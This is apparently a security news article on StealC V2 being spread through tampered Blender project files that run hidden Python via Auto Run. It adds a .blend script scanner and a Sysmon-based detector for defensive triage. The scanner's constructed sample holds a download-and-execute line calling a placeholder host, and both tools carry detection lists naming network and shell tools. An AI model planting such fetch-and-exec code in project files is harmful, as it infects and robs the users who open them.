According to Infosecurity Magazine, Russian-speaking threat actors have been running a sophisticated malware campaign for at least six months by hiding StealC V2 inside Blender 3D project files. The attackers placed manipulated .blend files on platforms including CGTrader, where users downloaded them thinking they were legitimate 3D assets. When opened with Blender’s Auto Run feature enabled, these files executed concealed Python scripts that launched a multistage infection process. The malware, promoted on underground forums since April 2025, now targets over 23 browsers, 100 plugins, 15 desktop wallets, and various messaging and VPN clients. StealC V2 is priced from $200 per month to $800 for six months, making it accessible to low-tier cybercriminals. Morphisec researchers connected this activity to the same Russian-speaking actors previously associated with StealC distribution.
Abusing Blender’s Auto Run feature
Here’s the thing about this attack: it exploits a feature that many 3D artists actually use. Blender’s Auto Run Python Scripts option exists for workflow automation, so that rig control panels, drivers and helper scripts bundled inside a .blend file work the moment it opens, but here it is the delivery mechanism. The infected files carry a tampered Rig_Ui.py text block, a name artists expect to see because rigging tools such as Rigify store a rig UI script inside rigged character files, and when Blender runs it on load it fetches additional payloads from remote domains. Because these are legitimate-looking assets on established marketplaces, users have no reason to suspect anything is wrong. It is social engineering meets technical exploitation, a dangerous combination. Two details matter for anyone assessing exposure. Auto Run is off by default: with it off, Blender refuses to execute the embedded script and shows a warning instead, so the campaign only works on users who switched it on, typically because some earlier rig “needed” it. And the option is a global switch (Preferences, Save & Load) with an exclusion list rather than a per-file allowlist, so enabling it for one trusted rig enables it for every download afterwards; starting Blender with --disable-autoexec overrides the saved preference for that session and is the safer way to open anything untrusted.
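A practitioner triaging downloads wants to know what scripts a .blend file carries before anyone opens it with Auto Run on. The following is an added example written for this page, not Morphisec’s tooling or anything from the campaign: it walks the classic .blend file-block table (12-byte header, then blocks of 4-byte code, int32 size, old pointer, int32 SDNA index, int32 count), pairs each TX (Text) datablock with the DATA blocks that hold its lines, and flags lines that look like a downloader. The indicator list, the name heuristic, and the sample file (a tampered Rig_Ui.py next to a harmless notes block, with a placeholder URL) are all constructed here; it does not parse Blender’s DNA catalogue and does not handle the newer large-file header, and compressed files must be decompressed first.

```python
import re
import struct

# Indicators a text block does more than drive a rig UI (constructed for this example).
SUSPICIOUS_PATTERNS = [
    r"\bimport\s+(urllib|requests|socket|subprocess|ctypes|base64)\b",
    r"\bfrom\s+(urllib|subprocess|ctypes)\b",
    r"\b(exec|eval|compile)\s*\(",
    r"\bos\.(system|popen|startfile)\s*\(",
    r"https?://",
    r"\.lnk\b",
]

def parse_header(buf):
    """Return (pointer size, struct endian prefix, version) from the 12-byte header."""
    if buf[:2] == b"\x1f\x8b" or buf[:4] == b"\x28\xb5\x2f\xfd":
        raise ValueError("compressed .blend (gzip / zstd): decompress it first")
    if len(buf) < 12 or buf[:7] != b"BLENDER":
        raise ValueError("not a classic-format .blend file")
    ptr_size = {b"_": 4, b"-": 8}.get(buf[7:8])
    endian = {b"v": "<", b"V": ">"}.get(buf[8:9])
    if ptr_size is None or endian is None:
        raise ValueError("unrecognised pointer-size / endianness flags")
    return ptr_size, endian, buf[9:12].decode("ascii")

def iter_blocks(buf):
    """Yield (code, data) for each file block: code[4], int32 size, old pointer,
    int32 SDNA index, int32 count, then `size` bytes of payload."""
    ptr_size, endian, _ = parse_header(buf)
    fmt = endian + "4si" + ("Q" if ptr_size == 8 else "I") + "ii"
    hdr_len, pos = struct.calcsize(fmt), 12
    while pos + hdr_len <= len(buf):
        code, size, _old_addr, _sdna, _count = struct.unpack_from(fmt, buf, pos)
        code = code.rstrip(b"\0").decode("ascii", "replace")
        start = pos + hdr_len
        if size < 0 or start + size > len(buf):
            raise ValueError(f"truncated block {code!r} at offset {pos}")
        yield code, buf[start:start + size]
        if code == "ENDB":
            return
        pos = start + size
    raise ValueError("no ENDB terminator: file is truncated")

def _id_name(tx_data):
    # The ID struct's name field is the two-letter ID code followed by the name
    # ("TXRig_Ui.py"); matching it by pattern avoids parsing the DNA catalogue.
    m = re.search(rb"TX([\x20-\x7e]{1,64})", tx_data)
    return m.group(1).decode("ascii") if m else "<unnamed>"

def extract_text_datablocks(buf):
    """Pair each TX block with the DATA blocks that follow it (the TextLine structs
    and the line strings they point to) up to the next ID block."""
    scripts, current = [], None
    for code, data in iter_blocks(buf):
        if code == "TX":
            current = {"name": _id_name(data), "chunks": []}
            scripts.append(current)
        elif code == "DATA" and current is not None:
            current["chunks"].append(data)
        else:
            current = None
    return scripts

def scan_blend(buf):
    """Return (script name, pattern, offending line) for every indicator hit."""
    findings = []
    for script in extract_text_datablocks(buf):
        for chunk in script["chunks"]:
            for raw in re.findall(rb"[\x20-\x7e\t]{4,}", chunk):  # strings(1)-style
                line = raw.decode("ascii")
                findings.extend((script["name"], p, line)
                                for p in SUSPICIOUS_PATTERNS if re.search(p, line))
    return findings

def _block(code, data, sdna=0, count=1):
    """Build one 64-bit little-endian file block (only used to construct the sample)."""
    return struct.pack("<4siQii", code.ljust(4, b"\0"), len(data), 0x7F00DEADBEEF, sdna, count) + data

# Constructed sample, not a real capture: a rig file carrying a tampered Rig_Ui.py
# next to a harmless notes block. The URL is a placeholder, not a real C2 domain.
SAMPLE_BLEND = (
    b"BLENDER-v402"
    + _block(b"GLOB", b"\0" * 40)
    + _block(b"TX", b"\0" * 32 + b"TXRig_Ui.py\0" + b"\0" * 60)
    + _block(b"DATA", b"\0" * 24)  # TextLine structs hold only pointers
    + _block(b"DATA", b"import bpy\0")
    + _block(b"DATA", b"import urllib.request, subprocess\0")
    + _block(b"DATA", b"exec(urllib.request.urlopen('http://example.invalid/stage2').read())\0")
    + _block(b"TX", b"\0" * 32 + b"TXnotes.txt\0" + b"\0" * 60)
    + _block(b"DATA", b"Character rig v3, thanks for downloading!\0")
    + _block(b"ME", b"\0" * 48)
    + _block(b"DNA1", b"SDNA" + b"\0" * 4)
    + _block(b"ENDB", b"")
)
```

Run scan_blend over the bytes of a downloaded file; on the sample it reports three hits, all inside Rig_Ui.py, and nothing for the notes block. Treat it as a triage filter rather than a verdict: the indicators are easy to obfuscate, and a clean scan says nothing about what the script will fetch once it runs.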
What StealC V2 actually does
This isn’t your average info-stealer. StealC V2 has expanded its capabilities quickly since it surfaced on underground forums earlier this year: credential theft from browsers, cryptocurrency wallets, messaging apps, VPN clients, you name it. In this campaign the malware creates LNK files in the Windows temp directory for persistence and uses the Pyramid C2 framework to retrieve encrypted payloads, so the .blend file only has to carry a small fetcher and the stealer itself is pulled down at run time. At $200 per month it is malware-as-a-service for criminals who cannot write their own tools. The uncomfortable question is how many other creative delivery methods are in use that nobody is watching for yet.
Broader security implications
This campaign should worry anyone in creative or industrial sectors. While this particular attack targets 3D artists and gamers, the technique could easily be adapted for industrial environments. Think about it: manufacturing facilities, engineering firms and design studios all run specialized software (CAD, simulation and content-creation tools) that, like Blender, embeds a scripting engine and will run code stored inside a project file. A downloaded model or drawing in such a format deserves the same suspicion as a macro-enabled Office document, and the useful controls are the same ones that work for macros: keep script auto-execution disabled by default, restrict who may turn it on, source assets through channels you control rather than public marketplaces where possible, and use application control so that a design tool cannot spawn shells or script hosts. The exposure lives in the application’s trust in the file, not in the machine it runs on.
The detection challenge
Morphisec says its deception-based approach caught this early by planting fake credentials in memory and browser storage: no legitimate process has any reason to read those decoys, so the moment StealC touches them the access is a high-fidelity signal and prevention kicks in. But let’s be real: how many organizations have that level of protection? Most security teams are still playing catch-up with basic endpoint protection. That this campaign ran for six months before being reported says a lot about the current state of detection; asset files rarely get inspected the way documents and executables do, and a Blender process fetching something from the internet looks, at first glance, like an artist’s add-on phoning home. We are relying on security vendors to find these needles in haystacks while attackers get more creative by the day.
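Short of a deception platform, the behavioural chain the article describes (Blender loading a script that reaches out to a remote host, spawns a shell or script host, and drops an LNK into the Temp directory for persistence) is something an existing EDR or Sysmon feed can already score. The following is an added example written for this page, not Morphisec’s detection logic or anything recovered from the campaign: it groups Sysmon-shaped events (ID 1 process create, 3 network connect, 11 file create) by blender.exe process and weights the indicators, relying on the fact that Blender runs its Python in-process, so a script’s subprocesses have blender.exe as parent. The event shape, paths, the 203.0.113.7 address, the child-process list and the weights are all assumptions constructed here; it ignores PID reuse and is a starting point for a hunt query rather than a signature for this specific campaign.

```python
import ntpath
from collections import defaultdict

# Blender runs its embedded Python in-process, so anything the script spawns has
# blender.exe as its parent. These children are what a loader typically uses.
LOLBIN_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "curl.exe", "bitsadmin.exe",
    "python.exe", "pythonw.exe",
}
# Where a dropped .lnk is a staging or persistence artefact rather than a user shortcut.
PERSISTENCE_DIRS = ("\\appdata\\local\\temp\\", "\\start menu\\programs\\startup\\")

def _base(path):
    return ntpath.basename(path).lower()

def _add(session, points, reason):
    session["score"] += points
    session["reasons"].append(reason)

def score_blender_sessions(events):
    """Group Sysmon-shaped events (1 = process create, 3 = network, 11 = file create)
    by blender.exe PID and attach weighted indicators. PID reuse is ignored."""
    sessions = defaultdict(lambda: {"score": 0, "reasons": []})
    blender_pids = {e["pid"] for e in events if e["id"] == 1 and _base(e["image"]) == "blender.exe"}
    for e in events:
        pid, cmd = e["pid"], e.get("cmd", "")
        if e["id"] == 1 and pid in blender_pids:
            # -y / --enable-autoexec forces script auto-execution on for that launch: weak signal.
            if "--enable-autoexec" in cmd or " -y " in f" {cmd} ":
                _add(sessions[pid], 1, "started with script auto-execution forced on")
        elif e["id"] == 1 and e.get("ppid") in blender_pids and _base(e["image"]) in LOLBIN_CHILDREN:
            _add(sessions[e["ppid"]], 3, f"blender.exe spawned {_base(e['image'])}: {cmd}")
        elif e["id"] == 11 and pid in blender_pids:
            target = e["target"].lower()
            if target.endswith(".lnk") and any(d in target for d in PERSISTENCE_DIRS):
                _add(sessions[pid], 3, f"wrote shortcut to persistence location: {e['target']}")
        elif e["id"] == 3 and pid in blender_pids:
            # Blender legitimately talks to the network (extensions, version check): weak signal.
            _add(sessions[pid], 1, f"outbound connection to {e['dst_ip']}:{e['dst_port']}")
    return dict(sessions)

def alerts(events, threshold=3):
    """Blender sessions whose indicator score reaches the threshold; a single weak
    signal such as an outbound connection never alerts on its own."""
    return [(pid, s["score"], s["reasons"])
            for pid, s in score_blender_sessions(events).items() if s["score"] >= threshold]

BLENDER = r"C:\Program Files\Blender Foundation\Blender 4.2\blender.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample telemetry, not a real capture. 203.0.113.7 is a documentation address.
EVENTS = [
    {"id": 1, "pid": 4120, "ppid": 3900, "image": BLENDER, "parent": EXPLORER,
     "cmd": rf'"{BLENDER}" C:\Users\art\Downloads\character_rig.blend'},
    {"id": 3, "pid": 4120, "image": BLENDER, "dst_ip": "203.0.113.7", "dst_port": 443},
    {"id": 1, "pid": 5012, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe", "parent": BLENDER,
     "cmd": r'cmd.exe /c start "" %TEMP%\update.lnk'},
    {"id": 11, "pid": 4120, "image": BLENDER, "target": r"C:\Users\art\AppData\Local\Temp\update.lnk"},
    # Benign session: an artist opening their own project, Blender writing its .blend1 backup.
    {"id": 1, "pid": 6100, "ppid": 3900, "image": BLENDER, "parent": EXPLORER,
     "cmd": rf'"{BLENDER}" C:\Users\art\Projects\scene.blend'},
    {"id": 11, "pid": 6100, "image": BLENDER, "target": r"C:\Users\art\Projects\scene.blend1"},
    # Render box launched with auto-exec forced on: a weak signal, below threshold on its own.
    {"id": 1, "pid": 7000, "ppid": 3900, "image": BLENDER, "parent": EXPLORER,
     "cmd": rf'"{BLENDER}" -b C:\render\shot01.blend -y -a'},
]
```

On the sample, alerts(EVENTS) returns only PID 4120 with a score of 7 and three reasons; the artist’s own project never appears, and the render box with auto-exec forced on scores 1 and stays below the threshold. The weights encode the point from the article: a Blender process talking to the internet is ordinary, a Blender process spawning cmd.exe and writing a shortcut into Temp is not.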
